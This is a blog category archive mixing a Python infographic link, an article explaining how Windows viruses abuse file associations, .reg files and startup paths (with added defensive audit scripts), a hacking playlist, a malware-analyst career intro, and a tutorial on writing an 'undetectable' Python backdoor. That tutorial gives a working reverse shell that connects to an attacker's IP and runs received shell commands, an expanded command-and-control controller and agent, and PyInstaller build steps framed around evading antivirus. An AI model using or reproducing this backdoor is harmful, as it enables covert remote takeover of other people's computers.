Category Archives: Programming

Learn it Faster: The Entire Python Language in a Single Image

Yusheng, a China-based developer, has created this brilliant infographic that encapsulates the entire Python 3 programming language in a single image. Python is one of the most popular programming languages and a skill every programmer should possess.

Yusheng’s mind map is here for you in an easily understandable format that will help you refresh your memory.

You can find the image online on GitHub, or save it directly from below.


[Image: Python 3 in one picture (Yusheng's mind map)]

Source: fossBytes

Understanding Viruses

Keep your friends close and enemies closer.

Contrary to popular belief, hackers’ own machines are often more vulnerable to attack than the average user’s. This is especially true of newcomers to hacking: they connect to remote machines more often, frequent dodgy forums, run with administrative privileges on their own machines and are inexperienced at covering their tracks. Further, experienced attackers often take advantage of those who are still learning and trying to get into the field. In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise. So for the newbie hacker it is vital to learn how to protect themselves, to avoid being consumed by their own curiosity.

Viruses are perhaps the oldest form of malicious software. They have been around for a long time and are still evolving and causing havoc all over the world. At first sight they look like innocent executable files, but once opened they can turn your world upside down in a second. Relying on antivirus software is fine as a first line of defense, but you need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential weak spots.

Depending on how destructive their payload is, computer viruses can result in a significant loss of data, time and money. In the best case you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there is always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many authors of today’s more diverse and sophisticated viruses take the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus program for day-to-day protection, especially since antivirus programs are very good at keeping you safe from known threats. However, if you’ve never had to fight a virus without your antivirus software, it’s only a matter of time before you will. The main reason is new viruses: before an antivirus can guard against one, a sample must be reported, the vendor has to add a signature or update its scanning code, and finally the definition database on every client has to be updated. Because virus protection changes every day, those annoying notifications your antivirus gives routinely are there to protect you. You must have noticed an option such as “Update Virus Database” in the update menu of any antivirus. This is evidence of the ongoing war against viruses.

In general, how do viruses work? Well, first, the programmer writes the executable code required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the author want the virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and coworkers? Making any of this happen requires “executable” code of some kind. Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code is run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed.

As easily avoided as this result seems to be, it still works far more often than it should. Virus writers have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code?
Of course you know that .exe files are executable, as are similar file types such as .cmd, .bat and .com. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories: standalone programs, code included within resources or libraries, and script or macro code executed by an interpreter of some kind. In a broad sense, a standalone program is any file type that the operating system itself will load and run. How do you know which ones these are? The answer lies in the Windows® registry. To battle viruses on their own turf you will have to be comfortable delving into the registry, so let’s look at how executable programs are invoked (a little technical, read slowly).

Launch the Registry Editor by opening Run and typing regedit, then expand the HKEY_CLASSES_ROOT (HKCR) node. It’s the operating system’s repository for file associations and commands. Under HKCR you’ll find nodes for every file extension registered on your computer. Navigate down the tree until you locate the key named .exe. Select it and observe that its default value (shown in the right-hand pane) is exefile. This is a pointer to another node under HKCR, the exefile key. Scroll down and find the exefile key. It contains a shell subkey, which is where a file type’s available actions are defined; in OS terminology these actions are known as verbs. For example, a Microsoft® Word document might have a “print” verb defined, which lets you right-click the file in Windows and choose Print from the context menu. Expand the shell subkey of the exefile node to view the verbs available for EXE files. You’ll probably see two or three subkeys, depending on your system. The one to be concerned with is open (HKCR -> exefile -> shell -> open). Expand it and select its command subkey. Each verb has its own subkey, and each of those has its own command subkey whose default value dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect: it executes the default verb’s command (open, for EXE files). For EXE files the open verb’s command is “%1” %*. This is the same substitution syntax used in batch files: the path and file name of the file you activated replace the “%1” parameter, and any switches or command-line parameters that go with it are passed through “%*”. So it stands to reason that any other file type whose open verb evaluates to some flavour of “%1” poses the same risk, and there are a number of them. A virus writer knows that many people won’t double-click a file with a .exe or .bat extension, but .cmd, .com and .pif files all carry the same “%1” %* open command, and .vbs files are handed straight to the Windows Script Host (WScript.exe “%1”), which runs them just as readily. Simply renaming virus.exe to virus.com probably increases the chance that the unsuspecting masses will run it.

Particularly dangerous (historically, at least) was the humble screen saver file type, .scr. Around the turn of the century .scr viruses were everywhere. Screen savers were widely believed to save power, which isn’t true (stand-by mode does far better), so people thought it couldn’t hurt to try one. Again, the extension hardly matters: everything a .exe virus can do, a .scr one can do equally well. The days of .scr may be gone, but viruses are here to stay, and whatever the type, extension, purpose and payload, the core concepts are the same. So let’s take a deeper look at how .scr viruses worked; the key to the future lies in the past.

Between the shadows. In your Registry Editor, compare the open verb’s command default value for EXE and SCR files. They’re nearly identical: “%1” %* for EXEs and “%1” /S for screen saver files. Screen savers are, as it turns out, standalone executables; the only difference is the /S switch for the SCR file type. The intended purpose of the screen saver’s open verb is to test a screen saver, and a real screen saver interprets the /S switch accordingly. Nothing stops a virus writer from giving their program a .scr extension and simply ignoring the /S switch when the user invokes it. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display a real screen saver, preoccupying you with pretty flowers while it destroys files on your hard drive in the background. That caption is stored as the default value of the open key itself. Just as you can rename “Recycle Bin” to “Dumpster” or “TrashCan”, you can change the “Test” caption to anything you like, or rename the “Open” option for a Word document to “Do Belly Dance”. Of course, this only changes the string, not what the verb does. (Try the Ctrl+F find function to poke around and feel the power of regedit. Be warned: don’t change anything you don’t understand. Changing display strings like “My Computer” is harmless, but changing a core command value may wreck your computer before you can undo it.)

Libraries Can Be Dangerous
Executable code can live inside resources or component libraries of many varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited that way. The file types include Dynamic Link Libraries (DLL), Control Panel applets (CPL, which are DLLs by another name) and the various type libraries (TLB, OLB and so on; these describe COM interfaces rather than contain code, but they ship alongside the DLLs that do). Library code isn’t directly executable through a “%1” open verb like an .exe, but that doesn’t mean it can’t be run: just about any function exported from a DLL can be invoked through the helper application RUNDLL32.EXE, and Control Panel applets were historically launched exactly that way.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or other library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus author’s part.

Scripts and Macros—Increased Flexibility Brings Increased Risk
Script code needs a script engine to interpret and run it, but it can still be exploited. Scripts come in several forms and can be used to automate a repetitive task, modify documents and do pretty much everything an .exe file can. Microsoft has done a lot to tighten the security of macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js or .vbs extensions, carry a default file association (WScript.exe) that causes them to be executed, no questions asked, when a user double-clicks them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts are fairly limited in their access to the host system for security reasons, but there is a little-known file type, the HTML Application (.hta extension, run by mshta.exe), which works like a client-side web application without those security restrictions. Its purpose is to let developers use their web development skills to build rich applications using the browser metaphor, but an unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros are plain text and can be examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods
The most common way for a virus to be activated is for a user to directly execute it, say as an e-mail attachment. Virus writers do just about anything to make you open the attachment, but most developers are savvy enough not to run an unknown executable. Of course, just about all of us have done it at one time or another, particularly now that viruses read address books and assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of methods for activating a virus on a computer that don’t require the user to explicitly run an executable. (Bare executable attachments are a rarer sight nowadays, since most e-mail services strip or scan them; attackers have moved on to archives, macro-bearing documents and links instead.)

Registration Files
Files with a .reg extension are registration files holding data to be merged into the system registry. Their open verb hands them to regedit.exe, so double-clicking one merges its contents into the registry after a single “Are you sure?” prompt that most users click straight through (and regedit /s imports silently, with no prompt at all). Once in the registry, the data can change anything it pleases: it may delete keys the system needs to start up, modify existing ones to make further file types vulnerable, or create a new entry for a previously unknown extension. An antivirus may not recognize, and hence ignore, a file extension such as .bobo, but a registry entry can make that extension’s default action “%1”, giving it all the powers of an .exe file. This could be devastating. Luckily, most antivirus products now also sandbox untested files: the file gets a test run in a sealed environment, and if it tries to reach something it shouldn’t or changes system settings without asking the user explicitly, the antivirus denies the action, raises a red flag and moves the file to quarantine (the virus vault) or deletes it outright.
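Here is an added example, not code from the original article, that puts the registry walk above and the .reg-file warning together in Python 3. It parses a .reg export of HKEY_CLASSES_ROOT (a constructed sample is embedded; the .bobo extension is the hypothetical one from the text), classifies each extension’s open command as “direct” (the file itself is the program, “%1”), “interpreter” (a script host or loader such as WScript.exe or rundll32.exe runs its contents) or “other” (the file is merely opened by an application), and on Windows can read the live associations through the standard winreg module. The list of interpreter names and the sample associations are my assumptions, not taken from the page.

```python
import re

# Host programs that execute whatever file they are handed (assumed list, extend as needed).
INTERPRETERS = {
    "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe",
    "mshta.exe", "rundll32.exe", "regedit.exe", "control.exe",
}

def first_token(command: str) -> str:
    """The program part of a shell\\open\\command value (handles the quoted form)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split()[0] if command else ""

def classify_open_command(command: str) -> str:
    """'direct' -> the file is the program ("%1" ...), e.g. .exe/.scr/.com/.pif
       'interpreter' -> a script host or loader runs the file's contents, e.g. .vbs/.js/.hta/.cpl
       'other' -> the file is merely opened by an application (notepad, Word, ...)"""
    token = first_token(command)
    if token == "%1":
        return "direct"
    program = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return "interpreter" if program in INTERPRETERS else "other"

def parse_reg(text: str) -> dict:
    """Pull extension -> (ProgID, open command) pairs out of a .reg export of HKCR.
    Only default values (@=) of '.ext' keys and '<ProgID>\\shell\\open\\command' keys are used."""
    ext_to_progid, progid_to_cmd, key = {}, {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('@="') and line.endswith('"') and key:
            value = re.sub(r'\\(["\\])', r"\1", line[3:-1])  # undo .reg escaping of \ and "
            m_ext = re.fullmatch(r"HKEY_CLASSES_ROOT\\(\.[^\\]+)", key, re.IGNORECASE)
            m_cmd = re.fullmatch(r"HKEY_CLASSES_ROOT\\([^\\]+)\\shell\\open\\command", key, re.IGNORECASE)
            if m_ext:
                ext_to_progid[m_ext.group(1).lower()] = value
            elif m_cmd:
                progid_to_cmd[m_cmd.group(1)] = value
    return {ext: (pid, progid_to_cmd[pid])
            for ext, pid in ext_to_progid.items() if pid in progid_to_cmd}

def audit_associations(associations: dict) -> dict:
    """Extensions whose open verb runs the file, with the category of risk."""
    result = {}
    for ext, (_progid, command) in associations.items():
        category = classify_open_command(command)
        if category != "other":
            result[ext] = category
    return result

def audit_reg(text: str) -> dict:
    """What a .reg file would register if imported; inspect this before double-clicking it."""
    return audit_associations(parse_reg(text))

def live_associations() -> dict:
    """Windows only: read the same data straight from HKCR via the winreg module."""
    import winreg
    result = {}
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, "") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            if not name.startswith("."):
                continue
            try:
                progid = winreg.QueryValueEx(winreg.OpenKey(root, name), "")[0]
                command = winreg.QueryValueEx(
                    winreg.OpenKey(root, progid + r"\shell\open\command"), "")[0]
            except OSError:
                continue
            result[name.lower()] = (progid, command)
    return result

# Constructed sample .reg export (not a real file from the article): a benign .txt association,
# a script association, and the hypothetical ".bobo" extension from the text made directly executable.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"

[HKEY_CLASSES_ROOT\.vbs]
@="VBSFile"

[HKEY_CLASSES_ROOT\VBSFile\shell\open\command]
@="\"%SystemRoot%\\System32\\WScript.exe\" \"%1\" %*"

[HKEY_CLASSES_ROOT\.bobo]
@="bobofile"

[HKEY_CLASSES_ROOT\bobofile\shell\open\command]
@="\"%1\" %*"
"""

if __name__ == "__main__":
    for ext, category in sorted(audit_reg(SAMPLE_REG).items()):
        print(f"{ext:8} {category}")
```

Run it against a real export (regedit, File > Export on HKEY_CLASSES_ROOT, or any .reg file you are about to import) with audit_reg(open(path, encoding="utf-16").read()); the verdict for .bobo is “direct”, which is exactly the silent privilege the text warns about.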

Path Vulnerabilities
Another hazard is the PATH environment variable. Anyone who uses a computer has used a shortcut file at least once. Whether it’s the Google Chrome icon on your desktop or WinZip in your taskbar, these shortcuts are simply links to the actual files in the folder where they were installed. It’s tedious to open My Computer -> C: -> Program Files -> Mozilla Firefox every time you want Firefox, so shortcut files store the path to the actual application. Shortcuts don’t use the PATH variable themselves, but the concept is the same: PATH is a list of directories the system searches, in order, when asked to run a program by bare name.

The computer has certain programs (explorer.exe, for example) that it routinely needs to start, for instance at boot or logon. Rather than hard-coding them, the registry stores the names of these programs and where to find them: the Winlogon Shell and Userinit values, the Run keys, service ImagePath values and so on. Whenever the OS needs to start one of them it looks up the entry, follows the path and launches the file. What does this have to do with viruses? With everything from phones to cars to houses getting smarter every day, viruses are not far behind. It’s a little too obvious when a user clicks a file and his computer immediately goes berserk: the victim, although compromised, is now a little wiser, because he knows exactly where it went wrong. If he downloaded something from a website that damaged his system, he may report the website to the police, and jail time is not appealing to anyone, least of all virus programmers.

This brings us back to path vulnerabilities. The attacker needs to infect a system without making it obvious, so s/he wants a time gap between the infection and the attack, so that it hits the victim out of the blue. There are two ways to do this by abusing how the system locates programs. Average users don’t sniff around system folders such as C:\Windows, and that understandable carelessness can be exploited. The attacker takes two systems, one with Windows 7 and one with XP, and looks up the location of, say, winlogon.exe, the program the OS uses to maintain a user session (you’ll see it running in Task Manager). The virus is then coded to drop a copy at the Windows 7 path and another at the XP path, delete the real winlogon.exe and rename itself winlogon.exe. At the next startup, when the OS looks for that file, it runs the virus instead: total stealth, and the victim has no clue what just happened. In practice this specific trick needs administrator rights, because files under System32 are not writable by ordinary users and Windows File Protection (Windows Resource Protection on Vista and later) restores tampered system binaries; the same idea works far more easily against a program in a directory that is searched earlier in the path and that the user can write to. The other way is to code the virus to edit the stored path in the registry from its default value to wherever the virus is, then rename itself. On the next startup the OS never even reaches the real file and starts the virus instead. Equally effective.
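What the text calls a path vulnerability is, in practice, search-order hijacking: whoever controls a directory that is searched before the real program’s directory controls what runs. The following Python 3 example is added here and is not the article’s code. It resolves a bare program name against a PATH list the way a shell or CreateProcess-style lookup does (honouring a PATHEXT-style suffix list) and reports which earlier directories are writable, i.e. where a same-named file could be planted. The directories, files and writable set in the sample are constructed, not real data; audit_current_environment() runs the same two checks against the live PATH of whatever machine executes it.

```python
import ntpath
import os
import posixpath

def _style(directory: str):
    """Pick the path flavour matching the directory string (lets the Windows case run anywhere)."""
    return ntpath if ("\\" in directory or directory[1:2] == ":") else posixpath

def resolve_command(name, path_entries, pathext=("",), exists=os.path.isfile):
    """Every file in PATH order that would satisfy a lookup for 'name'.
    pathext mimics Windows PATHEXT (".exe", ".cmd", ...); the first hit is what actually runs."""
    hits = []
    for directory in path_entries:
        join = _style(directory).join
        for ext in pathext:
            candidate = join(directory, name + ext)
            if exists(candidate):
                hits.append(candidate)
                break
    return hits

def hijack_candidates(name, path_entries, pathext=("",), exists=os.path.isfile,
                      writable=lambda d: os.access(d, os.W_OK)):
    """Directories searched *before* the one holding the real program that the current user
    can write to. Planting a same-named file there is a search-order hijack: no system file
    is touched, but the planted file runs instead of the real one on the next lookup."""
    hits = resolve_command(name, path_entries, pathext, exists)
    if not hits:
        return []
    style = _style(hits[0])
    real_dir = style.normcase(style.dirname(hits[0]))
    risky = []
    for directory in path_entries:
        if _style(directory).normcase(directory) == real_dir:
            break
        if writable(directory):
            risky.append(directory)
    return risky

def audit_current_environment(name):
    """Run both checks against the live PATH of the machine this executes on."""
    entries = [e for e in os.environ.get("PATH", "").split(os.pathsep) if e]
    if os.name == "nt":
        pathext = tuple(e.lower() for e in os.environ.get("PATHEXT", ".exe").split(";"))
    else:
        pathext = ("",)
    return resolve_command(name, entries, pathext), hijack_candidates(name, entries, pathext)

# Constructed example (not real data): a Windows PATH with two user-writable directories
# ahead of System32, and a notepad.exe copy already sitting in one of them.
SAMPLE_PATH = [r"C:\Tools", r"C:\Users\alice\bin", r"C:\Windows\system32", r"C:\Windows"]
SAMPLE_FILES = {
    r"C:\Windows\system32\winlogon.exe",
    r"C:\Windows\system32\notepad.exe",
    r"C:\Windows\notepad.exe",
    r"C:\Users\alice\bin\notepad.exe",
}
SAMPLE_WRITABLE = {r"C:\Tools", r"C:\Users\alice\bin"}
SAMPLE_PATHEXT = (".exe", ".cmd", ".bat")

def sample_report(name):
    """Resolution and hijack report for 'name' against the constructed sample."""
    return (resolve_command(name, SAMPLE_PATH, SAMPLE_PATHEXT, SAMPLE_FILES.__contains__),
            hijack_candidates(name, SAMPLE_PATH, SAMPLE_PATHEXT, SAMPLE_FILES.__contains__,
                              SAMPLE_WRITABLE.__contains__))

if __name__ == "__main__":
    for prog in ("winlogon", "notepad"):
        hits, risky = sample_report(prog)
        print(prog, "->", hits[0] if hits else None, "| writable dirs searched first:", risky)
```

In the sample, notepad already resolves to the copy in C:\Users\alice\bin rather than System32, which is what a shadowed program looks like; winlogon still resolves to System32, but two writable directories precede it. The defensive reading is the same in both cases: keep user-writable directories out of the front of PATH, and always launch security-sensitive programs by full path.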

The Best Offense is a Strong Defense
Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way, and even though the end is not in sight, the roads ahead are shorter than the ones behind. Cyber security today is tighter than ever, but that doesn’t mean we are immune. If you keep current antivirus software and keep your OS updated, you probably don’t need to worry about 99% of the malicious software out there, but the remaining 1% is the reason cyber security is a $100 billion market today. Successful attacks are rarer than ten years ago, but they make up for it in sheer intensity. More and more people rely on their computers every day, not realizing that on an infected machine, entering credit card details into a secure website can still hand them to a hacker, because the malware reads them before they are encrypted. Attacks are decreasing in number but rising in destructiveness. Today almost nobody bothers to spread a virus that simply causes reboots or wipes data, since there’s no gain in it for the attacker; malicious software is far more targeted. Clearly, obtaining someone’s social security number or bank PIN is worth much more to a hacker than deleting a random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unverified sources and make sure your antivirus software and OS are updated. Even if your system is compromised you may never know it, but the hacker may have identified you as an easy target; if he once got valuable information from your system, it’s very likely he will keep it compromised, silently, as a slave. Further, never store sensitive or financial information on your everyday computer; an offline system or an external hard drive is much safer.

Source: xueshack.com

Best Tracks To Listen To Whilst Hacking or Programming


I have made a list based on your comments about the best tracks to listen to whilst hacking or programming. Feel free to comment and I will add them to the list.

black sabbath – iron man
Godsmack – I stand alone
Zoraide – Cairobe
Rev Theory – hell yeah
Black Label Society – My Dying Time
skilet – monster
Wiz Khalifa – Work Hard Play Hard
Matrix soundtrack – clubbed to death
Rage against the machine – Wake up
David Guetta – Dangerous
Giorgio Moroder – 74 Is the New 24
United State of Pop 2014 – Do What You Wanna Do
Delerium – Silence ft. Sarah McLachlan
linkin park – Numb
A Skylit Drive – Crazy
2 Pac – Hit em up
Zedd – Clarity
goo goo dolls – Iris
iron maiden brave new world
Avicii – Levels
The Unlikely Candidates-Follow My Feet
Joe Esposito – You’re the best around
The Heavy – Short Change Hero
The Best of Two Steps From Hell | Ultimate Playlist
KT Tunstall – black horse and a cherry tree
Two Steps from Hell
Ryan Leslie-Swiss Francs
Windows Remix
Berlin Breakdown
come what may -air supply
Yuzurenai-negai
Tristam – ‘Till It’s Over
Tristam – I remember
jerryc – Canon rock
system of down – Toxicity
Cradle of filth- new day kicking
Metallica – master of puppets
battery, ride the lightning
Anti flag – you gotta die for your government
Guile’s theme
bryan adams – Dont give up
Red Hot Chili Peppers – Higher ground
TWRK – Living Room
life after river
Great Dane invite only
Drop the Bass trap remix
radioactive – imagine dragons
iron man – ready aim fire
System of a Down – Attack
linkin park – in the end
Daft Punk – Airodynamic
Daft Punk – Around the World
Daft Punk – One more time
Metallica – Orion
Police – The Other Way of Stopping
Flogging Molly – Black Friday Rule
That Fucking Tank – Stephen Hawkwind
Trans Am – Future World
Turing Machine – Synchronicity III
Prodigy – Voodoo People
Powerman 5000 – Free, Bombshell, When Worlds Collide
Prodigy – Thunder
Deadmau5 – The 16th Hour
Elephant – Tame Impala


Movie Soundtracks

Tron Soundtrack
The Social Network Soundtrack
The Matrix Soundtrack
Resident Evil Soundtrack

Can’t be bothered to search for the songs above?… here are some random ones you would never hear on the radio… feed your inner geek!


Writing Undetectable Custom Backdoor in 13 lines in Python


Today we are going to program a simple custom backdoor, a few lines of code, that at the time of writing was not flagged by antivirus scanners. Treat that as a snapshot rather than a property of the code: once copies of any public snippet circulate, signatures for it follow. We’re going to write this code in the Python programming language. If you don’t have the environment set up, don’t worry; I have another brief video/post covering the requirements.

The idea is to give you the power of creating your own backdoors instead of depending blindly on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are, although if you check my about page you’ll see I program in other languages. Nevertheless, I have faith that with a little effort we will be able not only to create a stealthier backdoor but also to add features such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.

Right now, this is mainly speculation and of course, the main aspect of this is not to have a shell to do bad things with it, but to learn how these protocols work in and out of Python — so yes, if you are interested in custom backdoors for another language, just drop a line. :)

Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.

Credits on the code go out to Dave Kennedy and his work on building several Python shells.

Custom Shell

Here is the code for the custom shell; just substitute the placeholder values (IP, port and so on) with your own.

#!/usr/bin/env python3
import subprocess, socket

HOST = 'Your IP Address'   # address of the machine running the listener (e.g. nc -l -p 443)
PORT = 443                 # 443 blends in with HTTPS, but this connection is plain, unencrypted TCP

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(b'Hello There!')
while True:
    data = s.recv(1024)
    # an empty read means the listener went away; "quit" (with or without a newline) ends the session
    if not data or data.strip() == b'quit':
        break
    # run the received line through the system shell and capture both output streams
    proc = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    out, err = proc.communicate()   # drains both pipes together; reading stdout then stderr can deadlock
    s.send(out + err)
# loop ends here
s.send(b'Bye now!')
s.close()


I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…
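The page hands the listening side to netcat. As an added example (not the author’s code, nor Dave Kennedy’s), here is a Python 3 controller plus a matching agent that speak the same “Hello There!” / command / “quit” / “Bye now!” protocol, with two changes a practitioner would make: every message carries a 4-byte length prefix, so command output longer than one recv() call arrives intact instead of being cut at 1024 bytes, and the agent uses subprocess.run() so both output pipes are drained together. loopback_session() runs the whole exchange inside one process over 127.0.0.1 so you can watch the protocol without a second machine; the framing format and helper names are my own. It is still plaintext TCP with no authentication: anyone who can reach the listener port owns the agent.

```python
import socket
import struct
import subprocess
import sys
import threading

def send_msg(sock, payload: bytes) -> None:
    """Frame = 4-byte big-endian length + payload, so the receiver knows where a message ends."""
    sock.sendall(struct.pack("!I", len(payload)) + payload)

def recv_exact(sock, n: int) -> bytes:
    """recv() may return fewer bytes than asked for; loop until exactly n have arrived."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_msg(sock) -> bytes:
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return recv_exact(sock, length)

def run_command(cmd: str) -> bytes:
    """Same shell=True execution as the article, but both pipes are captured together."""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.stdout + proc.stderr

def agent(host: str, port: int) -> None:
    """The connect-back side (what the article's shell.py does), speaking the framed protocol."""
    with socket.create_connection((host, port), timeout=10) as s:
        send_msg(s, b"Hello There!")
        while True:
            cmd = recv_msg(s).decode()
            if cmd == "quit":
                send_msg(s, b"Bye now!")
                return
            send_msg(s, run_command(cmd))

def controller(listener: socket.socket, commands):
    """The listening side the article delegates to netcat: accept one agent, issue commands."""
    conn, _peer = listener.accept()
    conn.settimeout(10)
    with conn:
        banner = recv_msg(conn)
        outputs = []
        for cmd in commands:
            send_msg(conn, cmd.encode())
            outputs.append(recv_msg(conn))
        send_msg(conn, b"quit")
        farewell = recv_msg(conn)
    return banner, outputs, farewell

def loopback_session(commands):
    """Run controller and agent in one process over 127.0.0.1 on an ephemeral port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    listener.settimeout(10)
    port = listener.getsockname()[1]
    worker = threading.Thread(target=agent, args=("127.0.0.1", port), daemon=True)
    worker.start()
    try:
        return controller(listener, commands)
    finally:
        worker.join(timeout=10)
        listener.close()

def big_output_command(n: int) -> str:
    """A portable command whose output exceeds the article's 1024-byte recv(): n bytes of 'x'."""
    return f'"{sys.executable}" -c "print(\'x\' * {n})"'

if __name__ == "__main__":
    banner, outputs, bye = loopback_session(["echo framing-test", big_output_command(5000)])
    print(banner, [len(o) for o in outputs], bye)
```

The second command produces about 5 KB of output; with the original recv(1024) loop the controller would have to guess where one reply ends and the next begins, which is why real C2 protocols always frame their messages.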

Compiling Executable

As mentioned in my previous post, we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megabytes), but it works and, at the time of writing, was not detected. Bear in mind that the PyInstaller bootloader itself is well known to antivirus engines, so packed scripts tend to attract heuristic flags over time.

Here are the commands used to compile the code; again, replace the placeholder part. Make sure you are inside the PyInstaller directory and that your script is copied there. (These three scripts belong to the old PyInstaller 1.x/2.0 layout; current releases install a single pyinstaller command, and the equivalent is pyinstaller --onefile shell.py.)

python Configure.py
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec

That’s about it, your executable should be ready to go — inside the /dist folder.

Presentation

Check out the video for commentary explaining the code line by line…

 

Source:technicdynamic

So You Want To Be A Malware Analyst

In war there are always two sides, the attackers and the defenders, and a less visible third group: the researchers and developers. While soldiers fight on the front lines, scientists and engineers research and develop new weapons, defenses and tools, things that give their side an advantage. If one of these creations is ever captured by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how it can be repurposed. The same goes for war on the cyber front: malicious attackers and system administrators (black hats and white hats) are the soldiers, malware authors develop new and dangerous forms of malware, and Malware Analysts reverse engineer those weapons to find out how to stop them.

What is a Malware Analyst?

A Malware Analyst is a highly specialized reverse engineer, programmer and detective. They use various tools and expert-level knowledge to understand not only what a particular piece of malware can do but also how it does it. Becoming a Malware Analyst requires a great deal of focus and discipline, as well as training and practice in the inner workings of computer systems and programming in multiple languages, and a keen mind for solving puzzles and connecting the dots.

You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things. You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous one; every day is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place.

The type of person who would be perfect for becoming a Malware Analyst would be:

  • A fast learner
  • Able to derive meaning from nonsense
  • A good puzzle solver
  • Able to think outside of the box
  • Willing to frequently use the scientific method
  • Resourceful

Prerequisites

Prior to walking the path to become a Malware Analyst, a person should be familiar with:

  • Operating System Concepts
  • High Level & Low Level Programming (familiarity is fine, working knowledge not required at first)
  • Fundamentals of networking
  • How to use the internet to perform research

Building the basics

Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones.  So where should you start when it comes to your training? You should master a few basics before trying anything too advanced:

Learn Assembly Language

In the hierarchy of programming languages you have, at the top, scripting languages like Perl or Python, followed by high- and middle-level languages like C++ and C, then assembly language, then machine language and finally the binary encoding read by the hardware.

Most malware is written in a middle-level language and, once the code is complete, compiled all the way down so it can be run by the hardware and operating system. At this level the code is not human-readable. For a Malware Analyst to read the code, they need to disassemble it, and the highest-level representation that can be recovered reliably from machine code is assembly (decompilers produce C-like pseudocode, but it is an approximation). It is therefore imperative that a would-be Malware Analyst learn to read and write assembly.

Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level languages is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code.

Analysts Tip:  Learning Assembly is easy if you already know a higher-level language, imagine what the operating system needs to do in order for a single function call to execute, this is what you will see in Assembly.  By learning shortcuts to parsing Assembly, you will find what you are looking for much faster.

Learn how to use the tools

